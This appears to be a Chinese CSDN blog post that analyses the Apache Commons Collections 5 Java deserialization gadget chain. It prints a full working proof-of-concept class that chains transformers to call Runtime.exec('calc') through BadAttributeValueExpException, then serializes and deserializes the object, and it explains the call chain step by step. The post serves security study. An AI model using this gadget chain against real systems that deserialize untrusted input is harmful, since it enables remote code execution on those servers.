java反序列化 exp_java反序列化Commons-Collections5分析

最新推荐文章于 2022-08-17 23:06:54 发布
最新推荐文章于 2022-08-17 23:06:54 发布
阅读量115 收藏
点赞数
文章标签: java反序列化 exp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42522400/article/details/114622897
版权

BadAttributeValueException

package org.lain.poc;

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.keyvalue.TiedMapEntry;

import org.apache.commons.collections.map.LazyMap;

import java.io.*;

import javax.management.BadAttributeValueExpException;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.util.Map;

public class Poc {

public static void main(String[] args) throws Exception {

Transformer[] transformers = new Transformer[] {

//传入Runtime类

new ConstantTransformer(Runtime.class),

//反射调用getMethod方法,然后getMethod方法再反射调用getRuntime方法,返回Runtime.getRuntime()方法

new InvokerTransformer("getMethod",

new Class[] {String.class, Class[].class },

new Object[] {"getRuntime", new Class[0] }),

//反射调用invoke方法,然后反射执行Runtime.getRuntime()方法,返回Runtime实例化对象

new InvokerTransformer("invoke",

new Class[] {Object.class, Object[].class },

new Object[] {null, new Object[0] }),

//反射调用exec方法

new InvokerTransformer("exec",

new Class[] {String.class },

new Object[] {"calc"})

};

Transformer transformerChain = new ChainedTransformer(transformers);

Map innerMap = new HashMap();

Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

//decorate实例化LazyMap类。

// LazyMap類的get方法調用了transform,transform可以通過反射机制执行命令

TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); //TiedMapEntry中调用了toString方法->调用了map的get方法

BadAttributeValueExpException poc = new BadAttributeValueExpException(null); //BadAttributeValueExpException的构造方法调用toString方法

// val是私有变量,所以利用下面方法进行赋值,val变量赋值为TiedMapEntry的实例化对象,

// 重写了BadAttributeValueExpException的readObject方法的val变量赋值为BadAttributeValueExpException类,

// 就会调用BadAttributeValueExpException的val = valObj.toString();触发上面的

Field valfield = poc.getClass().getDeclaredField("val");

// System.out.println(valfield);

valfield.setAccessible(true);

valfield.set(poc, entry);

File f = new File("poc.txt");

ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));

out.writeObject(poc);

out.close();

//从文件中反序列化obj对象

FileInputStream fis = new FileInputStream("poc.txt");

ObjectInputStream ois = new ObjectInputStream(fis);

//恢复对象

ois.readObject();

ois.close();

}

}

参考链接的第一篇文章主要写的是poc怎么构造的,思路很清晰了,这篇文章从逆向分析,看下怎么反序列的。调用链如下:

BadAttributeValueException.readObject ->

TiedMapEntry.toString ->

LazyMap.get ->

ChainedTransformer.transform

执行BadAttributeValueException.readObject前,把val赋值为TiedMapEntry这个类

Field valfield = poc.getClass().getDeclaredField("val");

valfield.setAccessible(true);

valfield.set(poc, entry);

就会调用TiedMapEntry类的toString方法。

88d77f286388f5a6d5be2fed6cb20046.png

112ba5ad49a9c6538b04894306ef6aa6.png

调用getValue又调用get方法

51e9176ae274c9f02bb297d71cf2af62.png

map赋值给lazyMap

Map innerMap = new HashMap();

Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

John Sheppard
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化(五)Common Collection 3分析
Vicl1fe的博客
05-31 305
前言 环境 jdk 1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 ObjectInputStream.readO
java反序列化利用程序UI版Beta1.1.rar
07-20
5. **CVE漏洞**:历史上,例如CVE-2015-4852(Apache Commons Collections反序列化漏洞)、CVE-2016-5385(Oracle WebLogic Server漏洞)等,都是由于不安全的反序列化导致的安全问题。 6. **防御策略**:防止反...
CommonsCollections5分析
笑花大王
01-02 378
CommonsCollections5 调用链 BadAttributeValueExpException.readObject() | TiedMapEntry.toString() | LazyMap.get() | ChainedTransformer.transform() | ConstantTransformer.transform() | ...
java反序列化 exp_java反序列化exp实践
weixin_34125336的博客
02-16 209
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserial其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包.foxloveseciswinhttp://www.iswin.org/2015/11/13/Apache-CommonsCollections-D...
Java反序列化漏洞分析commons.collections利用链5
weixin_45644323的博客
10-24 1691
Commons Collections包为Java标准的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。让我们在开发应用程序的过程中,既保证了性能,同时也能大大简化代码。 Collections包中的“Map”是在java.util.Map的基础上扩展的接口和类。有如下常用的Map: LinkedMap,可以维护条目顺序的map; BidiMap,即双向Map,可以通过key找到value,也可以通过value找到key。需要注意的是Bidi
java反序列化Commons-Collections5分析
weixin_30381317的博客
12-30 384
BadAttributeValueException package org.lain.poc; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.c...
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
Commons Collections反序列化
最新发布
12-15
Java编程领域,Apache Commons Collections库是一个非常实用的工具包,它提供了大量的集合类和算法,极大地丰富了Java集合框架的功能。然而,由于历史原因,这个库存在一个已知的安全问题,那就是“Commons ...
Java反序列化攻击
01-21
Java 反序列化攻击漏洞由FoxGlove 的近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。  由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,...
Java Web反序列化网络安全漏洞分析.pdf
03-31
Java Web反序列化漏洞是指在Java Web应用程序中,由于对序列化对象的不当处理,攻击者可以构造恶意的序列化数据,导致程序在反序列化过程中执行非预期的代码,从而引发安全问题。这种漏洞的存在使得攻击者可以绕过...
Apache Commons Collections 反序列化详细分析学习总结
weixin_30376453的博客
09-20 255
0x01.环境准备: Apache Commons Collections 3.1版本,下载链接参考: https://www.secfree.com/a/231.html jd jui地址(将jar包转化为java源码文件): https://github.com/java-https://www.secfree.com/a/231.html/jd-gui/releases...
java--CommonsCollections5学习
zyer
05-30 240
cc5和cc6差不多,主要都是利用TideMapEntry从而利用LazyMap调用get方法,而LazyMap的get方法需要的参数是LazyMap中没有的值才会触发LazyMap的transform的put方法。 TiedMapEntry 主要使用的是LazyMap的get方法,那么在这里我们可以看到其中getValue,hashCode,equals,toString都可以触发 那么下面我们需要寻找一个可以输入TideMapEntry这个类,并且可以触发这些函数之一的一个类。 BadAtt
Java安全—CommonsCollections5
XINO
08-17 571
今天给大家带来的是CC5链的构造分析,也是基本按照CC1走下来的,只是后面的部分不太一样。希望大家有所收获。
[JAVA反序列化初学3]Commons-Collections5利用链分析
GX233的博客
03-24 5155
[JAVA反序列化]Commons-Collections5利用链分析
[Java反序列化]CommonsCollections5利用链学习
feng的博客
08-16 815
前言 奇奇怪怪的就把CC5给看了。在看一个师傅的CC1的文章的时候,发现他写的LazyMap链不太一样,我以为是CC1的新链,然后也学习了一波,然后查了一下发现是CC5。。。 环境 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId>
java反序列化 exp_java反序列化-ysoserial-调试分析总结篇(2)
weixin_32287387的博客
02-25 169
前言:这篇主要分析commonCollections2,调用链如下图所示:调用链分析分析环境:jdk1.8.0反序列化的入口点为src.zip!/java/util/PriorityQueue.java此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类接下来调用siftDownUsingComparator函数在这里将调用Transfo...
异常——JAVA异常(B)
大风的博客
03-31 2862
JAVA异常 —— B 此JAVA异常指的是java.lang.Exception的子类,对异常源码中注释的分析主要是基于JDK8。异常顺序是根据异常最终类名的首字母进行排序。本篇主要整理的是B开头的异常。 BackingStoreException 抛出以表示由于后备存储中的故障而无法完成首选项操作,或无法联系后备存储 异常全路径 java.util.prefs.BackingStoreExce...
java反序列化 exp_JAVA反序列化exp及使用方法
weixin_36038435的博客
02-16 421
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本.其中weblogic和jenkins提供python脚本,但需自己加载payload.而对于jboss和websphere则提供了poc的数据包.更多信息在:foxgl...
JAVA反序列化exp及使用方法
热门推荐
乐枕的家
12-09 1万+
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波 exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本. 其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包. 更多信息在
Java反序列化入门:URLDNS链与ysoserial利用
ysoserial是一个重要的工具,它在2015年因Apache Commons Collections库的反序列化远程命令执行漏洞而闻名。这个工具集成了多种Java反序列化payload,允许攻击者选择合适的利用链来构造恶意数据,然后通过发送这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值